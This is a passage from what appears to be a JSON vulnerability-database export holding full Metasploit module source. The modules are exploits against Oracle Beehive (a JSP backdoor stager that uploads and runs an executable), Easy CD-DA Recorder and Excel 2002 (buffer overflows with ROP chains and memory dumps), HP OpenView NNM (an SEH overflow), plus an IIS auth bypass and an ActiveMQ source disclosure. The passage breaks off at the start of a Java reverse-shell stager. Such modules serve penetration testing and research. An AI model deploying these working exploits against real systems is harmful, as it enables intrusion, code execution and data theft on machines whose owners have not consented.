\"Oracle Beehive's base directory\", '/'])\n ])\n end\n\n\n def check\n res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))\n\n if res && /RECXML Prompt Tester/ === res.body\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')\n end\n\n # Init some names\n exe_name = \"#{Rex::Text.rand_text_alpha(5)}.exe\"\n stager_name = \"#{Rex::Text.rand_text_alpha(5)}.jsp\"\n\n print_status(\"Stager name is: #{stager_name}\")\n print_status(\"Executable name is: #{exe_name}\")\n\n # pwd:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\home\n # Targeted path:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\BEEAPP\\applications\\voice-servlet\\voice-servlet\\prompt-qa\n register_files_for_cleanup(\n \"../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}\"\n )\n\n\n # Ok fire!\n print_status(\"Uploading stager...\")\n res = upload_stager(stager_name, exe_name)\n\n # Hmm if we fail to upload the stager, no point to continue.\n unless res\n fail_with(Failure::Unknown, 'Connection timed out.')\n end\n\n print_status(\"Uploading payload...\")\n upload_payload(stager_name)\n end\n\n\n # Our stager is basically a backdoor that allows us to upload an executable with a POST request.\n def get_jsp_stager(exe_name)\n jsp = %Q|<%@ page import=\"java.io.*\" %>\n<%\n ByteArrayOutputStream buf = new ByteArrayOutputStream();\n BufferedReader reader = request.getReader();\n int tmp;\n while ((tmp = reader.read()) != -1) { buf.write(tmp); }\n FileOutputStream fostream = new FileOutputStream(\"#{exe_name}\");\n buf.writeTo(fostream);\n fostream.close();\n Runtime.getRuntime().exec(\"#{exe_name}\");\n%>|\n\n # Since we're sending it as a GET request, we want to keep it smaller so\n # we gsub stuff we don't want.\n jsp.gsub!(\"\\n\", '')\n jsp.gsub!(' ', ' ')\n Rex::Text.uri_encode(jsp)\n end\n\n\n # Stager will be found under:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\BEEAPP\\applications\\voice-servlet\\voice-servlet\\prompt-qa\\\n def upload_stager(stager_name, exe_name)\n jsp_stager = get_jsp_stager(exe_name)\n uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'encode_params' => false, # Don't encode %00 for us\n 'vars_get' => {\n 'evaluation' => jsp_stager,\n 'recxml' => \"..\\\\#{stager_name}%00\"\n }\n })\n end\n\n # Payload will be found under:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\home\\\n def upload_payload(stager_name)\n uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'data' => generate_payload_exe(code: payload.encoded)\n })\n end\n\n def print_status(msg)\n super(\"#{rhost}:#{rport} - #{msg}\")\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oracle_beehive_evaluation.rb"}, {"lastseen": "2019-11-03T21:40:38", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry. By persuading the victim to open a specially-crafted PLS file, a remote attacker can execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-10T19:46:09", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF", "href": "", "type": "metasploit", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'chap0', # Vulnerability discovery and original exploit\n 'Gabor Seljan', # Metasploit module\n 'juan vazquez' # Improved reliability\n ],\n 'References' =>\n [\n [ 'BID', '40631' ],\n [ 'EDB', '13761' ],\n [ 'OSVDB', '65256' ],\n [ 'CVE', '2010-2343' ],\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' => \"\\x0a\\x3d\",\n 'Space' => 2454,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\n # easycdda.exe 3.0.114.0\n # audconv.dll 7.0.815.0\n {\n 'Offset' => 1108,\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jun 7 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\n ],\n self.class)\n\n end\n\n def nops\n return make_nops(4).unpack(\"V\").first\n end\n\n def rop_nops(n = 1)\n # RETN (ROP NOP) [audconv.dll]\n [0x1003d55d].pack('V') * n\n end\n\n def exploit\n\n # ROP chain generated by mona.py - See corelan.be\n rop_gadgets =\n [\n 0x1007261e, # POP EDX # RETN [audconv.dll]\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\n 0x1005d288, # POP EBP # RETN [audconv.dll]\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\n 0x00000996, # 0x00000996-> EBX\n 0x1008740c, # POP EDX # RETN [audconv.dll]\n 0x00000040, # 0x00000040-> EDX\n 0x1001826d, # POP ECX # RETN [audconv.dll]\n 0x004364c6, # &Writable location [easycdda.exe]\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\n nops,\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\n ].flatten.pack('V*')\n\n sploit = rop_nops(target['Offset'] / 4)\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\n sploit << [target.ret].pack(\"V\")\n sploit << rop_nops(22)\n sploit << rop_gadgets\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(10000) # Generate exception\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/easycdda_pls_bof.rb"}, {"lastseen": "2019-11-30T12:13:29", "bulletinFamily": "exploit", "description": "This module exploits a source code disclosure in Apache ActiveMQ. The vulnerability is due to the Jetty's ResourceHandler handling of specially crafted URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1 over Windows 2003 SP2 and Ubuntu 10.04.\n", "modified": "2017-07-24T13:26:21", "published": "2012-10-14T20:36:02", "id": "MSF:AUXILIARY/SCANNER/HTTP/APACHE_ACTIVEMQ_SOURCE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Apache ActiveMQ JSP Files Source Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',\n 'Description' => %q{\n This module exploits a source code disclosure in Apache ActiveMQ. The\n vulnerability is due to the Jetty's ResourceHandler handling of specially crafted\n URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1\n over Windows 2003 SP2 and Ubuntu 10.04.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Veerendra G.G', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-1587' ],\n [ 'OSVDB', '64020' ],\n [ 'BID', '39636' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8161),\n OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])\n ])\n end\n\n def run_host(ip)\n\n print_status(\"#{rhost}:#{rport} - Sending request...\")\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n if res and res.code == 200\n contents = res.body\n fname = File.basename(datastore['TARGETURI'])\n path = store_loot(\n 'apache.activemq',\n 'text/plain',\n ip,\n contents,\n fname\n )\n print_status(\"#{rhost}:#{rport} - File saved in: #{path}\")\n else\n print_error(\"#{rhost}:#{rport} - Failed to retrieve file\")\n return\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb"}, {"lastseen": "2019-12-07T19:21:48", "bulletinFamily": "exploit", "description": "This module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-25T20:48:36", "id": "MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "href": "", "type": "metasploit", "title": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',\n 'Description' => %q{\n This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.\n },\n 'References' =>\n [\n [ 'CVE', '2010-2731' ],\n [ 'OSVDB', '66160' ],\n [ 'MSB', 'MS10-065' ],\n [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]\n ],\n 'Author' =>\n [\n 'Soroush Dalili',\n 'sinn3r'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Jul 02 2010\"\n ))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The URI directory where basic auth is enabled', '/'])\n ])\n end\n\n\n def has_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n vprint_status(res.body) if res\n\n return (res and res.code == 401)\n end\n\n def try_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n uri << Rex::Text.rand_text_alpha(rand(10)+5) + \".#{Rex::Text.rand_text_alpha(3)}\"\n\n dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'\n\n user = Rex::Text.rand_text_alpha(rand(10) + 5)\n pass = Rex::Text.rand_text_alpha(rand(10) + 5)\n\n\n vprint_status(\"Requesting: #{dir}\")\n res = send_request_cgi({\n 'uri' => dir,\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n vprint_status(res.body) if res\n\n return (res and res.code != 401 and res.code != 404) ? dir : ''\n end\n\n def run\n if not has_auth\n print_error(\"No basic authentication enabled\")\n return\n end\n\n bypass_string = try_auth\n\n if bypass_string.empty?\n print_error(\"The bypass attempt did not work\")\n else\n print_good(\"You can bypass auth by doing: #{bypass_string}\")\n end\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/iis_auth_bypass.rb"}, {"lastseen": "2019-12-07T19:22:22", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results in arbitrary code execution under the context of the user.\n", "modified": "2017-09-14T02:03:34", "published": "2011-11-21T17:36:47", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_038_EXCEL_OBJ_BOF", "href": "", "type": "metasploit", "title": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nicolas Joly', # Initial discovery\n 'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB 24 exploit and binary analysis\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2010-0822'],\n ['OSVDB', '65236'],\n ['BID', '40520'],\n ['MSB', 'MS10-038'],\n ['URL', 'https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/']\n ],\n 'Payload' =>\n {\n 'Space' => 4000\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => 'true'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n # This is the one that can be downloaded from MSDN\n 'Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3',\n {\n 'ftCmoReserved' => 0x307d91ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n 'CraftedPointer' => 0x307d91a6, # Ptr to PtrToRet in the stored contents on Excel .data\n 'PtrToRet' => 0x307d908e, # Ptr to Ret - 11Ch\n 'Ret' => 0x30006113 # call ecx from Excel.exe 10.0.2614.0\n }\n ],\n [\n 'Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3',\n {\n 'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n 'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data\n 'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch\n 'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 8 2010\",\n 'DefaultTarget' => 1))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The filename', 'msf.xls'])\n ])\n end\n\n def exploit\n\n path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2010-0822.xls')\n f = File.open(path, 'rb')\n template = f.read\n f.close\n buf = ''\n buf << template[0..35016]\n buf << [target['ftCmoReserved']].pack('V')\n buf << template[35021..36549]\n buf << [target['PtrToRet']].pack('V')\n buf << [target.ret].pack('V')\n buf << template[36558..36559]\n buf << [target['CraftedPointer']].pack('V')\n buf << template[36564..36609]\n buf << [target['CraftedPointer']].pack('V') # Pass the MSO_804()\n buf << template[36614..36639]\n buf << payload.encoded\n buf << template[40640..template.length]\n file_create(buf)\n\n end\nend\n\n=begin\n\nMemory analysis on Office XP SP2\n\n'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n------------------------------------------------------------------------------------------\n\n0:000> db 0x307de5ac\n307de5ac 00 30 74 00 a6 e5 7d 30-4c 4c 00 55 6e 69 72 42 .0t...}0LL.UnirB\n307de5bc 42 42 42 4c 00 48 50 44-6f 63 55 49 53 55 49 00 BBBL.HPDocUISUI.\n307de5cc 54 72 75 65 00 52 65 73-6f 6c 75 74 69 6f 6e 00 True.Resolution.\n307de5dc 36 30 30 64 70 69 a6 e5-7d 30 74 52 65 73 00 46 600dpi..}0tRes.F\n307de5ec 61 6c 73 65 90 90 90 90-90 90 90 90 90 90 90 90 alse............\n307de5fc 90 90 90 90 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA\n307de60c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de61c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data\n-----------------------------------------------------------------------------------\n\n0:000> db 0x307de5a6\n307de5a6 8e e4 7d 30 a5 61 00 30-74 00 a6 e5 7d 30 4c 4c ..}0.a.0t...}0LL\n307de5b6 00 55 6e 69 72 42 42 42-42 4c 00 48 50 44 6f 63 .UnirBBBBL.HPDoc\n307de5c6 55 49 53 55 49 00 54 72-75 65 00 52 65 73 6f 6c UISUI.True.Resol\n307de5d6 75 74 69 6f 6e 00 36 30-30 64 70 69 [[a6 e5 7d 30]]* ution.600dpi..}0\n307de5e6 74 52 65 73 00 46 61 6c-73 65 90 90 90 90 90 90 tRes.False......\n307de5f6 90 90 90 90 90 90 90 90-90 90 41 41 41 41 41 41 ..........AAAAAA\n307de606 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de616 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n* => 0x307de5a6 + 0x3c => 0x307de5e2\n\n'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch\n---------------------------------------------\n\n307de48e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de49e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ae 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4be 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ce 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4de 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ee 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4fe 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de50e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de51e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de52e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de53e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de54e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de55e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de56e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de57e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de58e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de59e eb 60 6e 00 50 72 69 6e-8e e4 7d 30 [[a5 61 00 30]]* .`n.Prin..}0.a.0\n307de5ae 74 00 a6 e5 7d 30 4c 4c-00 55 6e 69 72 42 42 42 t...}0LL.UnirBBB\n307de5be 42 4c 00 48 50 44 6f 63-55 49 53 55 49 00 54 72 BL.HPDocUISUI.Tr\n307de5ce 75 65 00 52 65 73 6f 6c-75 74 69 6f 6e 00 36 30 ue.Resolution.60\n307de5de 30 64 70 69 a6 e5 7d 30-74 52 65 73 00 46 61 6c 0dpi..}0tRes.Fal\n307de5ee 73 65 90 90 90 90 90 90-90 90 90 90 90 90 90 90 se..............\n307de5fe 90 90 41 41 41 41 41 41-41 41 41 41 41 41 41 41 ..AAAAAAAAAAAAAA\n307de60e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de61e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de62e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de63e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de64e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de65e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de66e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de67e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n* 0x307de48e + 0x11c => 0x307de48e\n\n'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0\n----------------------------------------------------------\n\nEXCEL!Ordinal41+0x61a5:\n300061a5 ffd1 call ecx\n300061a7 e00b loopne EXCEL!Ordinal41+0x61b4 (300061b4)\n300061a9 c1536689 rcl dword ptr [ebx+66h],89h\n300061ad 46 inc esi\n300061ae 2a8d8574ffff sub cl,byte ptr [ebp-8B7Bh]\n300061b4 ff5068 call dword ptr [eax+68h]\n300061b7 1200 adc al,byte ptr [eax]\n300061b9 0400 add al,0\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb"}, {"lastseen": "2019-11-27T19:03:31", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.\n", "modified": "2017-09-14T02:03:34", "published": "2011-03-23T15:43:25", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVWEBSNMPSRV_URO", "href": "", "type": "metasploit", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1960' ],\n [ 'OSVDB', '65427' ],\n [ 'BID', '40637' ],\n [ 'ZDI', '10-105' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 10240, # 10240 byte buffer..\n # In addition to regular HTTP type bad chars, this one also has\n # an issue with \" since the buffer is being passed on the command line.\n 'BadChars' => (0x00..0x1f).to_a.pack('C*') + \"\\x20\\x21\\x22\\x24\\x2c\\x3b\\x3c\\x3e\\x60\",\n 'DisableNops' => true,\n # Manually use FPU to get EIP into ECX\n 'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\n 'EncoderOptions' => { 'BufferRegister' => 'ecx' },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01206',\n {\n 'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 08 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/jovgraph.exe'\n\n # A long command line option (starts with -) will cause a buffer overflow.\n\n # Action just has to be set, doesn't matter what it is.\n action = rand_text_alphanumeric(1)\n\n # \"timestamp\" cannot be set.\n\n start = 'Unrecognized option: '\n\n # SEH\n seh_offset = 0x2cb0 # 0x13ffb0 - 0x13d300\n seh_frame = generate_seh_record(target.ret)\n\n # Jump back to the payload, after p/p/r jumps to us.\n # NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars..\n # 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself\n distance = seh_offset - 1 + seh_frame.length # dry run\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n distance = seh_offset - start.length - 1 - jmp_back.length\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n\n # A short jump back to the long jump back :)\n jmp_small = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + jmp_back.length.to_s).encode_string\n jmp_small << rand_text(2)\n\n buf = '-'\n buf << payload.encoded\n buf << \"A\" * (seh_offset - start.length - buf.length - jmp_back.length)\n buf << jmp_back\n buf << jmp_small\n buf << [target.ret].pack('V')\n\n # Send the request\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'act' => action,\n 'arg' => buf,\n }\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n print_status(res.to_s) if datastore['NNM_DEBUG']\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb"}, {"lastseen": "2019-11-05T01:46:19", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\n", "modified": "2017-11-21T19:53:33", "published": "2010-07-20T00:53:24", "id": "MSF:PAYLOAD/JAVA/SHELL/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Command Shell, Java Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/java/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 5303\n\n include Msf::Payload::Stager\n include Msf::Payload::Java\n include Msf::Payload::Java::ReverseTcp\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Java Reverse TCP Stager',\n 'Description' => 'Connect back stager',\n 'Author' => ['mihi', 'egypt'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 